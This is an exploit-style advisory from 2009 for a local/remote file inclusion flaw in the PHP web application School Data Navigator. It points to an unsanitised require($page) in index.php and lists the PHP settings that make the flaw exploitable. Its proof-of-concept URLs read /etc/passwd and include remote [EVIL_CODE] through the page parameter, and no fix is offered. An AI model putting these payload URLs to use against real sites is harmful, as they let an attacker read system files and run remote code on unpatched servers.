School Data Navigator (page) Local-Remote File Inclusion Vulnerability

2009-06-10 17:35:57

----------------------------------------------------------------------------------------------------

Name : School Data Navigator
Site : http://sourceforge.net/projects/school-data-nav/
Down : http://216.92.6.173/data_navigator/app_and_readme.zip

----------------------------------------------------------------------------------------------------


Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com

----------------------------------------------------------------------------------------------------

Description:

Bug : Local/Remote File Inclusion

Look this: index.php:48: require($page); The variable was not declared properly.

If allow_url_fopen=on --> RFI;
If magic_quotes_gpc=off --> LFI;



----------------------------------------------------------------------------------------------------

P0c:

LFI:http://localhost/Scripts/app_and_readme/navigator/index.php?page=/etc/passwd
RFI: http://localhost/Scripts/app_and_readme/navigator/index.php?page=[EVIL_CODE]

OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.